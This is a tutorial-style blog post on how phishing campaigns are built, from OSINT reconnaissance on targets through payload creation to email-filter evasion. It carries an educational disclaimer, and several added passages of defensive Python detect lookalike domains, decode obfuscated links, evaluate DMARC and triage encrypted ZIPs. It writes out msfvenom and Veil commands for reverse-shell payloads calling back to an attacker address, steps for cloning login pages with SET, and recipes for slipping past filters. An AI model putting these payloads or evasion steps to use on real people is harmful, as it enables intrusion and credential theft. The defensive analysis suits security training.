How to Create a Phishing Email: An In-Depth Guide

Oct 4, 2024

Disclaimer: This writeup is written only for educational purposes. Phishing attacks are illegal and unethical, and they can damage people's lives. Understanding these methods is critical for cybersecurity professionals to enhance defenses and prevent breaches; this knowledge must not be used to create or launch a phishing attack.


From Where Phishing Word Came Into Existence

The term "phishing" is a play on the word "fishing." Just as fishermen throw bait into the water to catch fish, cybercriminals throw digital bait into the vast sea of internet users, hoping someone takes it. And, trust me, these attackers can be just as patient as that uncle who sits by the lake for hours with his fishing rod 😉!

Now, why the funky spelling with a "ph"? Well, that comes from the hacker scene of the 1990s, where using "ph" instead of "f" was the cool, edgy thing to do (remember "phreaking" with phone systems?). Hackers, always trying to add a bit of flair to their tricks, adopted this lingo for digital baiting.

So, next time you see the word "phishing," picture some sneaky digital angler out there, watching their lines, hoping to hook an unsuspecting internet fish… I mean, user. Possibly you.

It’s a funny image until you realize their "catch of the day" might be your personal info. Yikes!

In this writeup, we’re going to dive deep into how phishing emails are meticulously crafted, not to encourage malicious behavior, but to empower professionals like you to recognize, prevent, and educate others about these threats. Let’s break down each phase of a phishing campaign, keeping in mind that understanding the “how” is a huge part of defending against the “what.”

1. Defining Your Goal: What's the Endgame?

Every phishing campaign starts with a simple question: what does the attacker want to achieve? Before anything else, the goal has to be defined. Is it to steal login credentials? Implant malware? Trick the victim into transferring funds? Or simply harvest data?

Knowing the endgame shapes the entire strategy, from the email’s wording to the choice of tools.

Who is the Ideal Victim?

Not all phishing emails target the masses; some are crafted for a specific individual or group, known as "spear-phishing." To define the ideal victim:

• Role in the Organization: Ideal targets are those with privileged access, like CEOs, CFOs, or IT administrators. Some attackers go after HR or finance staff, since they handle sensitive employee data and payments.

• Behavior: People who frequently manage financial transactions, travel often, or have an active online social media presence are prime targets. Just ask yourself: Who is more likely to respond to a seemingly urgent request?

• Digital Footprint: Someone's social media activity reveals a lot about that individual. Are they involved in high-stakes projects? Where are they travelling? What do they like? Who are their friends? What is their favorite holiday spot? Did they recently talk about a job promotion? All of this helps the attacker craft an email that feels personalized and urgent.

2. Conducting Reconnaissance: The Research Phase


Attackers spend most of their time in the reconnaissance phase, hunting for as much data as possible about the target through every channel and tool available. This section covers how detailed information about a potential victim is collected before a phishing campaign starts.

Usage of OSINT Tools

Various OSINT tools are available on GitHub and in the default Kali build for gathering information about individuals and organizations. Some of them are:

• theHarvester: An open-source tool that gathers information about the target's domain, such as email addresses, subdomains, and IPs, from search engines and other public sources such as Google and Bing.

• Maltego: A graphical OSINT tool that maps out relationships between people, domains, email addresses, and infrastructure. It provides visual graphs that make it easy to see how information is connected.

• SpiderFoot: An automated reconnaissance tool that can mine data like domain names, email addresses, IP addresses, and much more from hundreds of public resources.

• Recon-ng: An OSINT reconnaissance framework that allows you to use built-in modules to extract details about employees, infrastructure, domains, and more.

Collecting the Right Data

Having the right amount of personal and professional data about the target is the most crucial part of a successful phishing campaign, and this phase should be carried out carefully and in detail: the more data collected about someone, the more credible the phishing email appears. The strategies used to get the most relevant data about a victim break down as follows:

  1. Email Formats: Tools like Hunter.io reveal the format of the target company's email addresses. Do they use firstname.lastname@company.com? Or perhaps f.lastname@company.com? Knowing this lets the attacker guess valid recipient addresses and craft a convincing sender address in the same style.


  2. Social Media, the Holy Grail of Information: People post personal and family photos, travel details, pictures of their hotels, and what they like and dislike on platforms like Facebook, Twitter and Instagram, while professional updates normally go on LinkedIn. These platforms are a goldmine for the attacker, who looks for employees' roles, job functions, recent activity and travel history. Facebook, Instagram and Twitter in particular reveal personal details, hobbies, and even daily routines. A well-crafted phishing email can then mention something as specific as, "Hope your son's soccer game went well!"


  3. Investigating the target company: Spend time learning about the company's ongoing projects, partners, and internal lingo. A simple visit to the company's website gives an idea of its branding and communication style. Publicly available documents, press releases, and even job postings reveal which tools and technologies the company uses (a job ad asking for experience with a particular SSO or ticketing product tells the attacker which login page to clone). This information allows the attacker to create a more tailored and believable email.

3. Crafting the Email Body: It’s All in the Details

Once the research and reconnaissance phase is complete, the attacker starts creating the phishing email. The key here is believability: the email should fit right into the target's normal communication flow without raising any doubt.

Example Email Body

Phishing Email Template

The language is formal, the urgency is clear, and the signature mimics the target's company style. The email includes enough subtle details (like the mention of the victim's name) to lower the recipient's defenses.

4. Infusing Payloads or Malicious Hyperlinks

This step is where things get technical. A malicious payload can be embedded in the email, either as an attachment or as a hyperlink leading to a site the attacker controls.

4.1. Crafting Payloads Using Msfvenom

The tool msfvenom from Metasploit is popular for generating payloads, especially when the goal goes beyond credential harvesting to code execution on the victim's machine.

Example 1: Creating a Basic Windows Payload

Here is how msfvenom is typically used to produce a basic payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe

• -p specifies the payload (windows/meterpreter/reverse_tcp).

• LHOST is the attacker's IP address.

• LPORT is the listening port for the reverse shell.

• -f is the output format; exe produces a Windows executable.

Note that msfvenom has no pdf output format, so an attacker cannot simply write -f pdf and get a booby-trapped document: turning an executable into something a document reader runs is a separate step, and no current PDF reader executes an embedded program on open without prompting. In practice a bare .exe attachment is also blocked by virtually every mail gateway, which is why real campaigns lean on macros, scripts and archives (see Challenge 4 below). The attacker's aim is the same whatever the wrapper: the recipient opens something that looks routine, and a reverse shell connects back to the attacker.

Example 2: Creating an Encoded Payload

Because a stock payload is signatured by every antivirus product, the classic next step is to run it through an encoder:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -e x86/shikata_ga_nai -i 3 -f exe > advanced_payload.exe

• -e x86/shikata_ga_nai applies a polymorphic XOR encoder to the payload.

• -i 3 runs the encoder for three iterations.

Caveat: shikata_ga_nai was written to avoid bad characters in exploit buffers, not to defeat antivirus. Its decoder stub is itself signatured, so an encoded Meterpreter is flagged by modern AV and EDR regardless of the iteration count. Treat this as a historical technique; the reverse_https transport on port 443 matters more today, because it blends into normal outbound TLS traffic.

Obfuscation Method

To go further, attackers have used payload-generation frameworks such as Veil-Evasion (Veil 3 syntax; the -t Evasion switch selects the tool):

veil -t Evasion -p python/meterpreter/rev_https.py --ip 192.168.1.100 --port 443

• Veil generates the Meterpreter stager in a different language (here Python) and packages it as a stand-alone executable, so the binary does not match signatures written for msfvenom output. When executed, it establishes a reverse HTTPS Meterpreter session. Like encoders, these generated binaries are now well known to AV vendors; the defensive lesson is that signature matching alone is not a reliable control against attachments.

4.2. Using the Social Engineering Toolkit (SET)

SET (Social Engineering Toolkit) is widely used to clone legitimate websites and harvest credentials.

Example of Using SET

  1. Open SET:

sudo setoolkit

  2. Choose Option 1 (Social-Engineering Attacks) → Option 2 (Website Attack Vectors) → Option 3 (Credential Harvester Attack Method).

  3. Select Site Cloner and enter the URL of the site to clone, such as https://example.com/login.

  4. Enter the IP address on which SET should listen for submitted credentials.

SET serves a copy of the target's login page, which the attacker links to in the phishing email. The victim, believing they are on the trusted site, enters their credentials, which SET captures and then forwards the victim to the real site so the login appears to succeed. Note that the copy is served from the attacker's own host, so the address bar, the certificate and any password-manager autofill (which keys on the real domain) will not match; that mismatch is what users should be trained to notice.

5. Choosing an Email Service Provider: Blending In

Low-effort campaigns are sent from free webmail accounts such as Gmail or Outlook.com, because those providers already have good sending reputation and recipients trust them. More sophisticated attackers run their own SMTP server on a domain they control: it lets them publish SPF and DKIM for that domain, control sending volume and timing, and avoid the abuse detection built into the big providers.

6. Spoofing Techniques: Building Credibility

Lookalike Domain Purchase

Attackers often buy domains that closely resemble legitimate ones (e.g., micr0soft.com, with a zero in place of the "o"). They then use these domains to create convincing sender addresses and to host cloned login pages.

  1. TLS Certificate: Obtaining a certificate for the lookalike domain (free from any ACME CA) adds a padlock in the browser. The padlock only proves that the connection to micr0soft.com is encrypted, not that micr0soft.com is Microsoft, but many users have been taught to read it as "safe".

  2. Email Hosting: Attackers use a mail hosting service or their own server to create sender addresses (e.g., support@micr0soft.com) and, because they own the domain, can publish valid SPF and DKIM records for it.
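Catching these domains on the receiving side is mostly string work. The following is an added example, not code from the original article, showing a classifier for the lookalike patterns this section and Challenge 3 mention (micr0soft.com, microsoft-support.com, secure-paypal.com) plus the brand-as-subdomain trick. The protected-brand list and the confusable-character table are constructed for the example, and the two-label rule for the registrable domain is a simplification noted in the code.

```python
# Brands this organisation wants to protect (constructed list for the example).
PROTECTED_DOMAINS = {"microsoft.com", "paypal.com", "example.com"}

# Substitutions attackers rely on because the glyphs look alike in common fonts.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize_label(label: str) -> str:
    """Undo look-alike substitutions: micr0soft -> microsoft, exarnple -> example."""
    label = label.lower()
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings; catches typosquats like mircosoft."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    # Assumption: the last two labels form the registrable domain. A production
    # check should use the Public Suffix List so that co.uk, com.au, etc. work.
    return ".".join(host.lower().strip(".").split(".")[-2:])


def classify_sender_domain(host: str, protected=PROTECTED_DOMAINS) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for a sender or link host."""
    host = host.lower().strip(".")
    if registrable_domain(host) in protected:
        return "legitimate"
    brands = {p.split(".")[0] for p in protected}
    # 1. Brand name used as a whole label or hyphenated token anywhere in the host:
    #    secure-paypal.com, microsoft-support.com, paypal.com.evil.net
    tokens = {t for label in host.split(".") for t in label.split("-")}
    if tokens & brands:
        return "lookalike"
    # 2. Confusable glyphs or a small edit distance in the second-level label:
    #    micr0soft.com, exarnple.com, mircosoft.com
    sld = normalize_label(registrable_domain(host).split(".")[0])
    for brand in brands:
        limit = 2 if len(brand) >= 8 else 1   # tolerate more noise in long names
        if levenshtein(sld, brand) <= limit:
            return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    for h in ["micr0soft.com", "microsoft-support.com", "secure-paypal.com",
              "paypal.com.evil.net", "exarnple.com", "mail.microsoft.com", "github.com"]:
        print(f"{h:28s} {classify_sender_domain(h)}")
```

Run it over the From: domain and over every link host in a message; a "lookalike" hit on either is a strong enough signal to quarantine on its own, and the same function can be pointed at newly registered domain feeds to spot a campaign before the first email lands.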

7. The Challenges Posed by Email Filters and How to Evade Detection in Phishing Emails

Email filters are the unsung heroes of digital security, standing guard to protect users from a tsunami of malicious phishing emails. With machine learning and AI-driven filtering, getting a phishing email past these defenses has become increasingly challenging for attackers, who in turn keep developing more sophisticated evasion methods. In this section we look at the checks filters perform and the practical techniques attackers use to get around them, so that defenders know which control each trick actually defeats and which ones still catch it.

Understanding Email Filters

Before diving into the evasion tactics, it’s crucial to understand how modern email filters work. Email filtering solutions like Microsoft Exchange Online Protection (EOP), Gmail's spam filter, and Proofpoint use a combination of techniques to detect and block phishing emails:

• Content Analysis: Examines the email body for suspicious phrases, malicious attachments, or obfuscated URLs.

• Header Analysis: Checks the sender’s address, SPF, DKIM, and DMARC records to verify authenticity.

• Machine Learning: Uses AI to identify patterns associated with phishing attacks, learning from previously detected phishing attempts.

• URL Inspection: Scans embedded links for known malicious websites or redirects.

• Attachment Scanning: Uses sandboxing to analyze email attachments for potentially harmful behavior.

• Reputation Checks: Compares sender information against databases of known spam and phishing sources.

Given these sophisticated defenses, you need to employ various techniques to evade detection. Here are some of the most common challenges posed by email filters and the methods used to bypass them.

Challenge 1: Content Analysis

Email filters aggressively scan the body of emails for keywords and patterns commonly associated with phishing. Phrases like "password reset," "urgent action required," and "click here" often trigger alerts.

Bypass Technique: Content Obfuscation

You can obfuscate text and links within the email to bypass content scanning.

Practical Example: Using HTML Encoding

Instead of directly placing a malicious link in the email, you can encode it using HTML. Here’s an example:

Original link:

<a href="http://malicious-website.com">Click here to update your account</a>

Obfuscated link using HTML encoding:

<a href="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#109;&#97;&#108;&#105;&#99;&#105;&#111;&#117;&#115;&#45;&#119;&#101;&#98;&#115;&#105;&#116;&#101;&#46;&#99;&#111;&#109;">Click here to update your account</a>

By encoding the URL, the attacker hopes to evade content analysis that relies on naive string or regex matching, which will not find "http://" or the domain name in the raw source. The caveat for defenders: any real HTML parser decodes numeric character references before it looks at the href, so a filter that parses the message (as every modern gateway does) sees exactly the same link the browser will follow. The trick only beats scanners that grep the raw bytes.
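To make that concrete, here is an added example (not code from the original article) that runs the page's own entity-encoded link through a byte-level regex and through a real HTML parser, and additionally flags the other common deception: link text that names one host while the href points at another. Both sample messages are constructed inline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples: the page's entity-encoded link, and a link whose visible
# text names one host while the href points somewhere else.
OBFUSCATED = (
    '<a href="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#109;&#97;&#108;&#105;&#99;'
    '&#105;&#111;&#117;&#115;&#45;&#119;&#101;&#98;&#115;&#105;&#116;&#101;&#46;'
    '&#99;&#111;&#109;">Click here to update your account</a>'
)
DECEPTIVE = '<a href="http://malicious-website.com/login">https://bank.example.com/login</a>'


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs. HTMLParser decodes character
    references in attribute values, so &#104;&#116;... comes back as 'http'."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._open = None          # [href, accumulated text] while inside <a>

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._open = [dict(attrs).get("href", ""), ""]

    def handle_data(self, data):
        if self._open is not None:
            self._open[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._open is not None:
            self.links.append((self._open[0], self._open[1].strip()))
            self._open = None


def extract_links(html: str):
    parser = LinkExtractor()
    parser.feed(html)
    parser.close()
    return parser.links


def naive_regex_links(html: str):
    """What a raw-bytes scanner sees: the encoded href contains no 'http://'."""
    return re.findall(r'href="(https?://[^"]+)"', html)


def suspicious_links(html: str):
    """Report each link's real host and whether the visible text names a
    different host (the deception users actually fall for)."""
    findings = []
    for href, text in extract_links(html):
        host = (urlparse(href).hostname or "").lower()
        named = [h.lower() for h in re.findall(r"https?://([^/\s]+)", text)]
        findings.append({
            "href": href,
            "host": host,
            "text": text,
            "text_host_mismatch": any(h != host for h in named),
        })
    return findings


if __name__ == "__main__":
    print("regex sees: ", naive_regex_links(OBFUSCATED))
    print("parser sees:", extract_links(OBFUSCATED))
    for finding in suspicious_links(DECEPTIVE):
        print(finding)
```

The regex returns nothing for the encoded message while the parser returns the plain http://malicious-website.com link, which is the whole point: decode first, then inspect. The host extracted this way is also what should be fed to reputation lookups and to the lookalike-domain check, not the raw attribute string.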

Practical Example: Using Image-Based Emails

Instead of using plain text that can easily be scanned by filters, you can embed the message as an image:

<img src="http://safe-image-server.com/phishing-content.png" alt="Click here to verify your account">

This approach makes it harder for content scanners to read the text since the text is now part of an image. However, sophisticated filters have started to use optical character recognition (OCR) to counter this technique.

Challenge 2: URL Inspection

URL inspection mechanisms are designed to detect and block links to known phishing websites or sites with suspicious behavior like multiple redirects.

Bypass Technique: URL Shortening and Redirection

Attackers use URL shortening services (e.g., Bitly, TinyURL) to obscure the final destination. Once the shortened link passes the initial inspection, it redirects the user to the malicious website.

Practical Example: Time-Based URL Redirection

Another approach is time-based redirection, where the link initially points to a harmless page so that the email passes delivery-time scanning; once the email has been delivered, the attacker changes what that page does. The link in the recipient's mailbox never changes, only the server behind it.

  1. The initial phishing email contains a link to a benign site under the attacker's control (e.g., http://safesite.com).

  2. After a certain period (e.g., 24 hours), the attacker updates the server's configuration to redirect visitors from http://safesite.com to http://malicious-website.com.

This delayed tactic exploits the fact that many email filters scan links at the time of delivery, not at the time of the user's click. Click-time URL rewriting (for example Microsoft Safe Links) exists precisely to close this gap, and a gateway that follows the redirect chain at click time will see the final destination.

Challenge 3: Header Analysis and Authentication Checks

Email filters scrutinize email headers to identify spoofed addresses and verify sender authenticity using SPF, DKIM, and DMARC records.

Bypass Technique: Email Header Manipulation and Domain Spoofing

Attackers register domains that resemble legitimate ones (e.g., microsoft-support.com) and configure SPF, DKIM, and DMARC for those domains so that the mail authenticates cleanly. It is worth being precise about what this achieves: the records make the attacker's own domain pass, which avoids the "unauthenticated sender" penalties that reputation and machine-learning filters apply. They do nothing to let the attacker send as microsoft.com itself; that is governed by Microsoft's DMARC policy, not the attacker's.

Practical Example: Configuring SPF, DKIM, and DMARC for a Lookalike Domain

  1. Domain Registration: Register a domain similar to the target (e.g., secure-paypal.com).

  2. SPF Record Setup: Add an SPF TXT record listing the mail servers allowed to send for the domain (the address below is from the documentation range; the original page's 123.456.78.90 is not a valid IPv4 address and a receiver would treat the record as malformed):

v=spf1 a mx ip4:203.0.113.10 -all

  3. DKIM Configuration: Generate a DKIM key pair and publish the public half in DNS:

o Private Key: stored on the mail server, which signs outgoing messages with it.

o Public Key: published in DNS under a selector (here "default"):

default._domainkey.secure-paypal.com TXT "v=DKIM1; k=rsa; p=PUBLIC_KEY_HERE"

  4. DMARC Record: Publish a DMARC record to define the handling policy:

_dmarc.secure-paypal.com TXT "v=DMARC1; p=none; rua=mailto:report@secure-paypal.com"

With these records in place, mail from @secure-paypal.com passes SPF, DKIM and DMARC and arrives with a dmarc=pass in its Authentication-Results header, which removes one of the strongest negative signals a filter has. Note what p=none means here: the attacker asks receivers to take no action on failures for secure-paypal.com and merely send reports, which is irrelevant to them. What matters for the defender is the impersonated brand's own policy: if paypal.com publishes p=reject, a message with a forged From: @paypal.com is rejected whatever the attacker authenticates; if it publishes p=none, that forgery is delivered, and the attacker does not even need a lookalike domain.
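The distinction between "my domain authenticates" and "I can spoof your domain" is easy to get wrong, so here is an added example (not code from the original article) that evaluates DMARC the way a receiver does, with identifier alignment, and also validates the ip4: tokens of an SPF record. The lookalike DMARC record is the page's; the two brand policies are constructed for the example and do not claim to be paypal.com's real record, and the organizational-domain rule is the same two-label simplification noted in the code.

```python
import ipaddress

# The page's DMARC record for the lookalike domain, and two constructed
# policies for the impersonated brand (paypal.com's real record is not assumed).
LOOKALIKE_DMARC = "v=DMARC1; p=none; rua=mailto:report@secure-paypal.com"
BRAND_DMARC_NONE = "v=DMARC1; p=none"
BRAND_DMARC_REJECT = "v=DMARC1; p=reject; adkim=s; aspf=s"


def spf_ip4_tokens_valid(spf_record: str) -> bool:
    """True if every ip4: mechanism is a syntactically valid address or CIDR."""
    for token in spf_record.split():
        if token.lower().startswith("ip4:"):
            try:
                ipaddress.ip_network(token[4:], strict=False)
            except ValueError:
                return False
    return True


def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=none; rua=...' into a tag dict with RFC 7489 defaults."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip().lower()] = value.strip()
    tags.setdefault("adkim", "r")   # relaxed alignment unless stated
    tags.setdefault("aspf", "r")
    tags.setdefault("p", "none")
    return tags


def organizational_domain(domain: str) -> str:
    # Assumption: last two labels. Real implementations use the Public Suffix List.
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def aligned(from_domain: str, authenticated_domain, mode: str) -> bool:
    """DMARC identifier alignment: strict = exact match, relaxed = same org domain."""
    if not authenticated_domain:
        return False
    if mode == "s":
        return from_domain.lower() == authenticated_domain.lower()
    return organizational_domain(from_domain) == organizational_domain(authenticated_domain)


def evaluate_dmarc(from_domain: str, spf_pass_domain, dkim_pass_domain, record: str):
    """Evaluate DMARC for the domain in the visible From: header.

    spf_pass_domain  - MAIL FROM domain that passed SPF, or None
    dkim_pass_domain - d= of a DKIM signature that verified, or None
    record           - the DMARC record published by from_domain
    Returns (result, action) where action is what the receiver should do.
    """
    tags = parse_dmarc(record)
    if aligned(from_domain, spf_pass_domain, tags["aspf"]) or \
       aligned(from_domain, dkim_pass_domain, tags["adkim"]):
        return "pass", "deliver"
    action = {"none": "deliver", "quarantine": "quarantine", "reject": "reject"}
    return "fail", action.get(tags["p"], "deliver")


if __name__ == "__main__":
    print(spf_ip4_tokens_valid("v=spf1 a mx ip4:123.456.78.90 -all"))   # page's record
    # Lookalike authenticates as itself: passes, but that says nothing about trust.
    print(evaluate_dmarc("secure-paypal.com", "secure-paypal.com", None, LOOKALIKE_DMARC))
    # Forged From: paypal.com while only secure-paypal.com authenticates.
    print(evaluate_dmarc("paypal.com", "secure-paypal.com", "secure-paypal.com", BRAND_DMARC_REJECT))
    print(evaluate_dmarc("paypal.com", "secure-paypal.com", None, BRAND_DMARC_NONE))
```

The three calls in the demo tell the story: secure-paypal.com passes for itself, a forged paypal.com From: fails whatever the attacker signs, and whether that failure is rejected or delivered depends entirely on the brand's p= tag. A defender's action item from this section is therefore to get their own domains to p=reject, not to worry about attackers' records.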

Challenge 4: Attachment Scanning

Most email filters use sandbox environments to open attachments and detect malicious behavior, making it difficult for attackers to deliver malware through attachments.

Bypass Technique: Payload Obfuscation and Multi-Stage Downloads

Practical Example: Using Encrypted ZIP Files

Attackers use password-protected ZIP files to deliver malicious attachments. Because the gateway cannot open the encrypted content, it cannot sandbox or signature-match what is inside, and the archive may pass through. The email itself provides the password, so the recipient can extract the contents. The obvious countermeasure, and one many gateways now apply, is to treat an encrypted archive whose password appears in the message body as hostile by itself, or to try that password against the archive and scan the result.

Sample Email Text:

Please find the confidential report attached. Use the password "Secure123" to open the file.

Upon extraction, the recipient finds a document with embedded macros. If the recipient enables them, the macros download the final payload (e.g., a trojan) from a remote server. Since Office now blocks macros by default in files that came from the internet, attackers have moved on to other wrappers, but the principle is unchanged: a benign-looking outer layer that the scanner cannot see through.
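A gateway does not need the password to notice this pattern: the ZIP central directory is unencrypted and carries both the member names and the encryption flag. The following is an added example, not code from the original article, that reads only that directory, extracts any password the sender put in the body (the page's sample text), and produces a triage decision. Because Python's zipfile cannot write encrypted archives, the fixture builds a plain ZIP and sets the encryption bit in both headers, which is exactly what the parser sees on a real password-protected file; the risky-extension list is a constructed starting point.

```python
import io
import re
import zipfile

# Member names a mail gateway should treat as high risk inside an archive
# (constructed list; tune for your environment).
RISKY_SUFFIXES = (".docm", ".xlsm", ".pptm", ".vbs", ".js", ".jse", ".hta",
                  ".exe", ".scr", ".lnk", ".iso")

# Constructed sample body, using the page's own wording.
SAMPLE_BODY = ('Please find the confidential report attached. '
               'Use the password "Secure123" to open the file.')


def password_in_body(text: str):
    """Return a password the sender helpfully included in the body, if any."""
    m = re.search(r'password\s*(?:is|:)?\s*["“]?([A-Za-z0-9!@#$%^&*_\-]+)', text, re.I)
    return m.group(1) if m else None


def inspect_zip(data: bytes) -> dict:
    """Read only the central directory (no extraction) and report whether the
    members are encrypted and whether any member name is risky."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        return {
            # bit 0 of the general-purpose flag is the encryption flag
            "encrypted": any(info.flag_bits & 0x1 for info in infos),
            "members": [info.filename for info in infos],
            "risky_members": [info.filename for info in infos
                              if info.filename.lower().endswith(RISKY_SUFFIXES)],
        }


def triage(zip_data: bytes, body: str) -> str:
    """Gateway decision. Encrypted archive plus a password in the body is the
    classic pattern; an encrypted archive alone is still unscannable."""
    report = inspect_zip(zip_data)
    if report["encrypted"] and password_in_body(body):
        return "quarantine: encrypted archive with password in message body"
    if report["encrypted"]:
        return "hold: encrypted archive, content cannot be scanned"
    if report["risky_members"]:
        return "block: risky member " + ", ".join(report["risky_members"])
    return "allow"


def build_sample_zip(name: str, content: bytes, mark_encrypted: bool) -> bytes:
    """Constructed test fixture: a plain archive, optionally with the encryption
    bit set in the local file header (offset 6) and central directory entry
    (offset 8) so that parsers report it exactly like a real encrypted ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    data = bytearray(buf.getvalue())
    if mark_encrypted:
        for signature, offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            idx = data.find(signature)
            while idx != -1:
                data[idx + offset] |= 0x01
                idx = data.find(signature, idx + 4)
    return bytes(data)


if __name__ == "__main__":
    sample = build_sample_zip("Q3_report.docm", b"not really a document", True)
    print(inspect_zip(sample))
    print(triage(sample, SAMPLE_BODY))
    print(triage(build_sample_zip("notes.txt", b"hello", False), SAMPLE_BODY))
```

The decision logic deliberately never extracts anything, so it is safe to run in the delivery path; if the gateway does want to look inside, the same password_in_body() result is what it would feed to the archive tool before scanning the contents.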

Practical Example: Using Multi-Stage Payloads

  1. The attacker sends a seemingly harmless PDF with a link inside.

  2. When the recipient clicks the link, it downloads a small script (e.g., a VBS file).

  3. The script, when executed, connects to an external server to download the main malicious payload.

This multi-stage approach makes it more challenging for filters to detect the final payload during the initial inspection.


Challenge 5: Machine Learning and Behavior Analysis

Advanced filters use machine learning models to identify phishing attempts based on email behavior, user interaction patterns, and historical data.

Bypass Technique: Mimicking Normal Email Behavior

You can attempt to mimic typical email patterns to avoid triggering machine learning-based detection.

Practical Example: Email Thread Hijacking

  1. The attacker compromises an email account within the target company (often through an earlier, simpler phish).

  2. They monitor ongoing email threads and insert themselves into a conversation, reusing its subject line, quoted history and tone so that their message appears to belong there.

  3. Since the message is sent from a genuine, fully authenticated internal mailbox as part of an existing conversation, neither authentication checks nor behavioral models have much to flag. Detection falls back to mailbox anomaly signals (a new forwarding or deletion rule, a login from an unusual location) and to the recipient noticing an odd request, such as changed payment details.

Conclusion

Phishing is not just about sending random emails; it's a rigorous and thoughtful process requiring research, technical know-how, and psychological manipulation. By dissecting this process, we’ve aimed to provide you with the knowledge to recognize and combat such attacks. Remember, it’s not just about protecting systems; it’s about safeguarding the people behind those systems.

Stay Vigilant: In the end, the best defense is awareness. Spread the knowledge, train employees, and always verify before you click.

